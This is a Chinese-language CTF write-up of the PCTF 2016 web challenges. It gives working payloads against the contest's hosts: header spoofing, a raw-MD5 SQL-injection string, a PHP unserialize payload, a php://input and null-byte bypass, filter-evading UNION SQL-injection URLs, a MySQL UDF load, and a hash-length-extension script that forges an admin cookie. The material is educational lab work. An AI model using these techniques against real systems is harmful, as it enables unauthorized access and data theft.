PCTF 2016 算是一次训练赛，题目较多，很多是原题，时间长，是一次很好的提升姿势的比赛。然而我姿势太低以至于只能在赛后看看别人的题解自己摸索。。。

0x01 PORT 51 WEB 100

这题本来不难，然而我在校内网，端口一过路由就变了，导致一直没做出来，后来看到别人说拔路由我才反应过来应该上 VPS 做的。。。

sudo curl --local-port 51 web.phrack.top:32772

拿到 flag

Yeah!! Here's your flag:PCTF{M45t3r_oF_CuRl}

0x02 LOCALHOST WEB 150

题目链接

抓包，加上一个 xff 头即可绕过限制。

X-Forwarded-For: 127.0.0.1

拿到 flag

Yeah!! Here's your flag:PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}

0x03 Login WEB 250

题目链接

在 headers 里看到这么一句

Hint:"select * from `admin` where password='".md5($pass,true)."'"

google 一下，找到参考链接。

直接用原文里的 payload：

content: 129581926211651571912466741651878684928
count:   18933549
hex:     06da5430449f8f6f23dfc1276f722738
raw:     ?T0D??o#??'or'8.N=?

拿到 flag

Correct pass!! Your Flag: PCTF{R4w_md5_is_d4ng3rous}

0x04 神盾局的秘密 WEB 300

题目链接

打开页面，就一张图片，看看源代码：

<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%">

base64 解开是 shield.jpg。
打开图片链接，出现图片的乱码，应该是文件读取了。

showimg.php: http://web.phrack.top:32779/showimg.php?img=c2hvd2ltZy5waHA=

<?php
    $f = $_GET['img'];
    if (!empty($f)) {
        $f = base64_decode($f);
        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
        && stripos($f,'pctf')===FALSE) {
            readfile($f);
        } else {
            echo "File not found!";
        }
    }
?>

index.php: http://web.phrack.top:32779/showimg.php?img=aW5kZXgucGhw

<?php
    require_once('shield.php');
    $x = new Shield();
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x->readfile();
?>
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>

shield.php: http://web.phrack.top:32779/showimg.php?img=c2hpZWxkLnBocA==

<?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }

        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

可以看出，flag 在 flag.php 中，但需要绕过 stripos。参数不从 img 传，应该从 class 传，这时 class 经过了反序列化，于是在本地随便搭建个环境。

index.php

<?php
    require_once('shield.php');
    $x = new Shield();
    echo serialize($x);
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x->readfile();
?>

shield.php

<?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = 'pctf.php') {
            $this -> file = $filename;
        }

        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

这样直接输出 payload：

O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}

burp 构造请求：

GET /index.php?class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";} HTTP/1.1
Host: web.phrack.top:32779
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36
DNT: 1
Referer: http://web.phrack.top:32779/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en-GB;q=0.6,en;q=0.4
Connection: close

拿到 flag

<?php
    //Ture Flag : PCTF{W3lcome_To_Shi3ld_secret_Ar3a}
    //Fake flag:
    echo "FLAG: PCTF{I_4m_not_fl4g}"
?>

0x05 In A Mess WEB 500

题目链接

index.phps 可以看到源码。

<?php

error_reporting(0);
echo "<!--index.phps-->";

if(!$_GET['id'])
{
    header('Location: index.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'Hahahahahaha';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("flag.txt");
}
else
{
    print "work harder!harder!harder!";
}


?>

id 绕过 ==0，随便试试就好了；data 绕过 stripos，用伪协议；b 绕过 eregi，用 00 截断，构造请求。

POST /index.php?id=.&a=php://input&b=%0012345 HTTP/1.1
Host: web.phrack.top:32783
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en-GB;q=0.6,en;q=0.4
Connection: close
Content-Length: 19

1112 is a nice lab!

拿到下一关的提示

<!--index.phps-->Come ON!!! {/^HT2mCpcvOLf}

访问 http://web.phrack.top:32783/%5eHT2mCpcvOLf/index.php?id=1，得到一个注入点。测试可以看到过滤了一些关键词和空格，双写加注释绕过，构造 payload。

//得到显示位3
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,3#
//数据库test
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,database()#   
//表名content
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(table_name)/*123*/frfromom/*111*/information_schema.tables/*111*/where/*111*/table_schema=0x74657374#    
//列名id, context, content
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(column_name)/*123*/frfromom/*111*/information_schema.columns/*111*/where/*111*/table_name=0x636F6E74656E74#  
//拿到flag    1:PCTF{Fin4lly_U_got_i7_C0ngRatulation5}:hi666
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(id,0x3a,context,0x3a,title,0x3a)/*123*/frfromom/*111*/content#

0x06 RE? WEB 300

题目链接

这一题完全不会，看到参考链接，结合 udf.so，猜测是换成了 Linux 下的 MySQL 函数加载。

show variables like "%plugin%";
+---------------+------------------------+
| Variable_name | Value                  |
+---------------+------------------------+
| plugin_dir    | /usr/lib/mysql/plugin/ |
+---------------+------------------------+

将 udf.so 复制到 /usr/lib/mysql/plugin/ 下，ida 打开可以看到里面有个 getflag 函数

create function getflag returns string soname "udf.so";
select getflag();
+------------------------------------------+
| getflag()                                |
+------------------------------------------+
| PCTF{Interesting_U5er_d3fined_Function}
 |
+------------------------------------------+

0x07 flag 在管理员手里 WEB 350

题目链接

随手尝试 http://web.phrack.top:32785/index.phps 下载到备份文件，结果打开全是乱码，重命名为.index.php.swp，用 vim 恢复。

vim -r index.php

得到源码。

<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
    body {
        background:gray;
        text-align:center;
    }
</style>
</head>

<body>
    <?php
        $auth = false;
        $role = "guest";
        $salt =
        if (isset($_COOKIE["role"])) {
            $role = unserialize($_COOKIE["role"]);
            $hsh = $_COOKIE["hsh"];
            if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
                $auth = true;
            } else {
                $auth = false;
            }
        } else {
            $s = serialize($role);
            setcookie('role',$s);
            $hsh = md5($salt.strrev($s));
            setcookie('hsh',$hsh);
        }
        if ($auth) {
            echo "<h3>Welcome Admin. Your flag is
        } else {
            echo "<h3>Only Admin can see the flag!!</h3>";
        }
    ?>

</body>
</html>

关键点应该在 md5($salt.strrev($_COOKIE["role"]))，Google 一下，看到参考链接 1 和参考链接 2。

于是可以改改人家的脚本。

# -*- coding:utf-8 -*-
from urlparse import urlparse
from httplib import HTTPConnection
from urllib import urlencode
import json
import time
import os
import urllib

def gao(x, y):
        #print x
        #print y
    url = "http://web.phrack.top:32785/index.php"
    cookie = "role=" + x + "; hsh=" + y
        #print cookie
    build_header = {
            'Cookie': cookie,
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0',
            'Host': 'web.phrack.top:32785',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    urlparts = urlparse(url)
    conn = HTTPConnection(urlparts.hostname, urlparts.port or 80)
    conn.request("GET", urlparts.path, '', build_header)
    resp = conn.getresponse()
    body = resp.read()
    return body

for i in xrange(1000):
    print i
    # secret len = ???
    find_hash = "./hash_extender -d ';\"tseug\":5:s' -s 3a4727d57463f122833d9e732f94e4e0 -f md5  -a ';\"nimda\":5:s' --out-data-format=html -l " + str(i) + " --quiet"
    #print find_hash
    calc_res = os.popen(find_hash).readlines()
    hash_value = calc_res[0][:32]
    attack_padding = calc_res[0][32:]
    attack_padding = urllib.quote(urllib.unquote(attack_padding)[::-1])
    ret = gao(attack_padding, hash_value)
    if "Welcome" in ret:
        print ret
        break

拿到 flag。

<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
    body {
        background:gray;
        text-align:center;
    }
</style>
</head>

<body>
    <h3>Welcome Admin. Your flag is PCTF{H45h_ext3ndeR_i5_easy_to_us3} </h3>
</body>
</html>

PCTF 2016 writeup WEB部分

May 28, 2016 • Read: 4357 • CTF

0x01 PORT 51 WEB 100

0x02 LOCALHOST WEB 150

0x03 Login WEB 250

0x04 神盾局的秘密 WEB 300

0x05 In A Mess WEB 500

0x06 RE? WEB 300

0x07 flag 在管理员手里 WEB 350